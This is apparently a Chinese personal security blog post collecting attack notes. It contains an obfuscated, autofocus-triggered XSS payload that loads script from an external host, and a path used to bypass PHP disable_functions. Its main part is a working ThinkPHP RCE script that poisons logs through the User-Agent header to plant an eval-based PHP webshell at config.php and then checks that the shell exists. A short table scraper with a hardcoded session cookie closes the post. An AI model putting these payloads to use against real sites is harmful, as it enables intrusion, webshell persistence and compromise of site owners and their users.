阶段性沉淀

一段时间小结

Posted by BugMan on June 3, 2020

阶段沉淀

1.1 xss

标签有效载荷-用于绕过设计不当的具有HTML5 autofocus属性的黑名单系统。

atob()解码base64

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHh0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>

$.getScript() 有效载荷 -包含JQuery的网站的有效负载示例

2.1 绕过disable_function

BT capnel cgi默认路径

unix:///tmp/php-cgi-56.sock

3.1python脚本

think PHP rce

import requests
import re
import datetime
import time
from bs4 import BeautifulSoup

proxies={
    'http':'127.0.0.1:8080',
    'https':'127.0.0.1:8080',
}
path=input('请输入本站日志路径:')
path1=['../runtime/log','/runtime/log']
today=datetime.date.today()
year=today.year
mon=str(today.month).rjust(2,'0')
day=str(today.day).rjust(2,'0')
url=input('有漏洞的网站:{For example:http://www.badu.cc/}')
def check_debug():
    debug_code=requests.get(url+'/1',proxies=proxies).status_code
    \#if debug_code == 404:
    \#print(debug_code)
    debug_txt=requests.get(url+'/1',proxies=proxies)
    \#soup=BeautifulSoup(debug_txt,'lxml')
    pagecode = debug_txt.text.replace('\n', '')
    pagecode = pagecode.replace(' ', '')
    pattern = re.compile('<divclass="col-md-3"><strong>DOCUMENT_ROOT</strong></div><divclass="col-md-9"><small>(.*?)</small></div>')
    result = pattern.findall(pagecode)
    print(result)
    Document_root=result[0]
    print(Document_root)
    return Document_root
\#check_debug()
\#Document_root = Document_root

def Req_Exp(x):
    headers1={
        'User-agent':'<?php echo "8888";file_put_contents("{0}/config.php",base64_decode("PD9waHAKCmNsYXNzIHh7CiAgICBwdWJsaWMgZnVuY3Rpb24gaXAoKXsKICAgICAgICRjPSAiICRfUE9TVFsxXSI7CiAgICAgICByZXR1cm4gJGM7CiAgICB9Cn0KJGMgPSBuZXcgeCgpOwokYiA9ICRjIC0+IGlwKCk7CmV2YWwoJGIpOwo/Pg=="));echo "456"; ?>'.format(x)
    }

​    Req_wirt=requests.get(url,headers=headers1,proxies=proxies)


def check_payload():

​    for i in path:

​        data={
​            '_method':'__construct',
​            'method':'get',
​            'filter[]':'think\__include_file',
​            'server':'phpinfo',
​            'get[]':'{0}/{1}{2}/{3}.log'.format(path1[0],year,mon,day),
​            'x':'ls'
​        
​        }
​        Req_inclu=requests.post(url,data,proxies=proxies)
​        return Req_inclu

def check_shell():
    Req_shell=requests.get(url+'/config.php',proxies=proxies).status_code
    if Req_shell == 200:
        print(url+'/config.php'+"是WebShell的")
    else:
        print("网站不存在GetShell的风险!")

\# Req_Exp(Document_root)
x=check_debug()
Req_Exp(x)
check_payload()
check_shell

网页表格写入csv文件

import requests

from bs4 import BeautifulSoup

import pandas as pd

import re

import csv

headers={

  "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0"

}

cookies={

  "session":"eyJ1c2VybmFtZSI6ImFkbWluQGdtYWlsLmNvbSJ9.XreRKA.ohlp6mCAttEMNdVJiqSvzxulWSE"

}

session = requests.Session()

csvFile = open(r"C:\Users\jxy\Desktop\maer\PG-爬虫\editors.csv", 'wt', newline='',encoding='utf-8')

writer = csv.writer(csvFile)



*#x=requests.session*

*#x.get(r'xxx',headers=headers,cookies=cookies)*

for i in range(1,35):

  url=''

  

  db_txt=session.get(url,headers=headers,cookies=cookies).content

  *#print(db_txt)*

  soup = BeautifulSoup(db_txt,'lxml')

  table = soup.findAll("table",{"class":"pure-table pure-table-bordered"})[0]

  rows = table.findAll("tr")

  *#csvFile = open(r"C:\Users\jxy\Desktop\maer\PG-爬虫\editors.csv", 'wt', newline='',encoding='utf-8')*

  *#writer = csv.writer(csvFile)*

  try:

  *# 遍历*

  

​    for row in rows:

​    *# 创建一个空列表*

​      csvRow = []

​    

​    *# 'td'一行中的列,*

​      for cell in row.findAll(['td', 'th']):

​      *# 利用函数get_text()获取-添加*

​        csvRow.append(cell.get_text())

​      

​    

​      

​      *# 写入*

​      writer.writerow(csvRow)

​    *#csvRow*

​    

​    *#print(test)*

​      print(csvRow)

​    print("第(%s)页完成输出"%(i))

  finally:

​    *#csvFile.close()* 

​    pass